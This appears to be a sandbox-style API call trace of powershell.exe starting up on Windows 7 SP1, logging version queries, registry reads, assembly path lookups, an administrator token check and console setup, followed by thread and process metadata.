	[0946.835] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42cd0, puLen=0x10ddf0) returned 1
	[0946.835] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0946.835] CoTaskMemAlloc (cb=0x44) returned 0x288fd0
	[0946.835] lstrcpyW (in: lpString1=0x288fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0946.836] CoTaskMemFree (pv=0x288fd0) 
	[0946.836] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42d38, puLen=0x10ddf0) returned 1
	[0946.836] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0946.836] CoTaskMemAlloc (cb=0x76) returned 0x2af180
	[0946.836] lstrcpyW (in: lpString1=0x2af180, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0946.836] CoTaskMemFree (pv=0x2af180) 
	[0946.836] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42dd4, puLen=0x10ddf0) returned 1
	[0946.836] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0946.836] CoTaskMemAlloc (cb=0x44) returned 0x288fd0
	[0946.836] lstrcpyW (in: lpString1=0x288fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0946.836] CoTaskMemFree (pv=0x288fd0) 
	[0946.836] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42e38, puLen=0x10ddf0) returned 1
	[0946.836] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0946.836] CoTaskMemAlloc (cb=0x58) returned 0x2689a0
	[0946.836] lstrcpyW (in: lpString1=0x2689a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0946.836] CoTaskMemFree (pv=0x2689a0) 
	[0946.836] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42eb4, puLen=0x10ddf0) returned 1
	[0946.836] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0946.836] CoTaskMemAlloc (cb=0x20) returned 0x309af0
	[0946.836] lstrcpyW (in: lpString1=0x309af0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0946.836] CoTaskMemFree (pv=0x309af0) 
	[0946.836] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42b5c, puLen=0x10ddf0) returned 1
	[0946.836] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0946.836] CoTaskMemAlloc (cb=0x66) returned 0x308840
	[0946.837] lstrcpyW (in: lpString1=0x308840, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0946.837] CoTaskMemFree (pv=0x308840) 
	[0946.837] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x0, puLen=0x10ddf0) returned 0
	[0946.837] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x0, puLen=0x10ddf0) returned 0
	[0946.837] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x0, puLen=0x10ddf0) returned 0
	[0946.837] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10ddc8, puLen=0x10ddc0 | out: lplpBuffer=0x10ddc8*=0x2e42b04, puLen=0x10ddc0) returned 1
	[0946.837] CoTaskMemAlloc (cb=0x204) returned 0x2b5ba0
	[0946.837] VerLanguageNameW (in: wLang=0x0, szLang=0x2b5ba0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0946.837] CoTaskMemFree (pv=0x2b5ba0) 
	[0946.837] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\", lplpBuffer=0x10de18, puLen=0x10de10 | out: lplpBuffer=0x10de18*=0x2e42a90, puLen=0x10de10) returned 1
	[0946.845] CoTaskMemAlloc (cb=0x104) returned 0x2f50b0
	[0946.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f50b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.845] CoTaskMemFree (pv=0x2f50b0) 
	[0946.846] CoTaskMemAlloc (cb=0x104) returned 0x2f50b0
	[0946.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f50b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.847] CoTaskMemFree (pv=0x2f50b0) 
	[0946.851] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dce8 | out: phkResult=0x10dce8*=0x2e8) returned 0x0
	[0946.852] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dcd8 | out: phkResult=0x10dcd8*=0x2ec) returned 0x0
	[0946.852] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dd68 | out: phkResult=0x10dd68*=0x2f0) returned 0x0
	[0946.855] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dcac, lpData=0x0, lpcbData=0x10dca8*=0x0 | out: lpType=0x10dcac*=0x1, lpData=0x0, lpcbData=0x10dca8*=0x56) returned 0x0
	[0946.856] CoTaskMemAlloc (cb=0x5a) returned 0x3087d0
	[0946.856] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10dc7c, lpData=0x3087d0, lpcbData=0x10dc78*=0x56 | out: lpType=0x10dc7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10dc78*=0x56) returned 0x0
	[0946.856] CoTaskMemFree (pv=0x3087d0) 
	[0947.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.486] CoTaskMemAlloc (cb=0x104) returned 0x2f50b0
	[0947.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f50b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.486] CoTaskMemFree (pv=0x2f50b0) 
	[0951.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0951.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0954.332] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0954.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.332] CoTaskMemFree (pv=0x2f51c0) 
	[0954.333] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0954.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.442] CoTaskMemFree (pv=0x2f51c0) 
	[0955.469] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0955.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.470] CoTaskMemFree (pv=0x2f51c0) 
	[0955.471] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0955.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.471] CoTaskMemFree (pv=0x2f51c0) 
	[0955.471] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0955.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.471] CoTaskMemFree (pv=0x2f51c0) 
	[0956.675] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0956.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.675] CoTaskMemFree (pv=0x2f51c0) 
	[0956.678] CoTaskMemAlloc (cb=0x104) returned 0x2f51c0
	[0956.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f51c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0956.678] CoTaskMemFree (pv=0x2f51c0) 
	[0957.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0957.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0967.902] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0967.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.902] CoTaskMemFree (pv=0x2f53e0) 
	[0967.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0967.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x10d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0968.226] SetErrorMode (uMode=0x1) returned 0x1
	[0968.226] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10dc40 | out: lpFileInformation=0x10dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0968.227] SetErrorMode (uMode=0x1) returned 0x1
	[0982.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.131] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0982.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.131] CoTaskMemFree (pv=0x2f53e0) 
	[0982.134] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0982.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.134] CoTaskMemFree (pv=0x2f53e0) 
	[0982.134] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0982.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.134] CoTaskMemFree (pv=0x2f53e0) 
	[0982.138] CoCreateGuid (in: pguid=0x10e008 | out: pguid=0x10e008*(Data1=0x715b57e6, Data2=0xe8ac, Data3=0x4854, Data4=([0]=0x8f, [1]=0x8e, [2]=0x83, [3]=0x2b, [4]=0x76, [5]=0x40, [6]=0xb5, [7]=0x9f))) returned 0x0
	[0982.142] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0982.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.142] CoTaskMemFree (pv=0x2f53e0) 
	[0982.145] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0982.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.145] CoTaskMemFree (pv=0x2f53e0) 
	[0982.147] CoTaskMemAlloc (cb=0x104) returned 0x2f53e0
	[0982.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f53e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.148] CoTaskMemFree (pv=0x2f53e0) 
	[0982.482] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0982.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10dcb0 | out: lpConsoleScreenBufferInfo=0x10dcb0) returned 1
	[0982.502] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0982.738] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10dcb0 | out: lpConsoleScreenBufferInfo=0x10dcb0) returned 1
	[0982.739] GetVersionExW (in: lpVersionInformation=0x10dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dc40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0982.742] GetCurrentProcess () returned 0xffffffffffffffff
	[0982.743] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x10dcd8 | out: TokenHandle=0x10dcd8*=0x304) returned 1
	[0982.748] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10dbf8 | out: TokenInformation=0x0, ReturnLength=0x10dbf8) returned 0
	[0982.749] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2c6210
	[0982.749] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x2c6210, TokenInformationLength=0x4, ReturnLength=0x10dbf8 | out: TokenInformation=0x2c6210, ReturnLength=0x10dbf8) returned 1
	[0982.750] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10dd58 | out: phNewToken=0x10dd58*=0x300) returned 1
	[0982.750] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10dbf8 | out: TokenInformation=0x0, ReturnLength=0x10dbf8) returned 0
	[0982.750] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x2c6240, TokenInformationLength=0x4, ReturnLength=0x10dbf8 | out: TokenInformation=0x2c6240, ReturnLength=0x10dbf8) returned 1
	[0982.750] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2f1d810*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10dd68 | out: IsMember=0x10dd68) returned 1
	[0982.750] CloseHandle (hObject=0x300) returned 1
	[0982.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.961] CoTaskMemAlloc (cb=0x804) returned 0x2966080
	[0982.961] GetConsoleTitleW (in: lpConsoleTitle=0x2966080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0982.962] CoTaskMemFree (pv=0x2966080) 
	[0982.994] CoTaskMemAlloc (cb=0x804) returned 0x2966930
	[0982.994] GetConsoleTitleW (in: lpConsoleTitle=0x2966930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0983.282] CoTaskMemFree (pv=0x2966930) 
	[0983.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.285] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0983.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0983.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c

Thread:
	id = 848
	os_tid = 0x1714


Thread:
	id = 861
	os_tid = 0x1748


Thread:
	id = 1361
	os_tid = 0x1ef4


Thread:
	id = 1370
	os_tid = 0x1f30


Thread:
	id = 1482
	os_tid = 0x1530


Thread:
	id = 1565
	os_tid = 0x20d0


Thread:
	id = 1630
	os_tid = 0x222c


Thread:
	id = 1650
	os_tid = 0x228c

	[0829.405] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "141"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4c49a000"
	os_pid = "0x1658"
	os_integrity_level = "0x3000"
